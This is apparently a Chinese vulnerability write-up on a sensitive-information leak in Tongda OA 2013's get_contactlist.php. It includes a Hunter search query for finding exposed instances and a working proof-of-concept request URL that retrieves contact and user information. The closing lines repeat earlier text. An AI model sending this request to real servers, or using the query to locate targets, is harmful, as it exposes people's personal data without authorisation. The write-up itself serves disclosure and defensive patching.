通达OA get_contactlist.php 敏感信息泄漏漏洞
一、漏洞简介
通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。
二、影响版本
- 通达OA2013
三、资产测绘
- hunter
app.name="通达 OA"
- 特征
四、漏洞复现
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。
app.name="通达 OA"
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3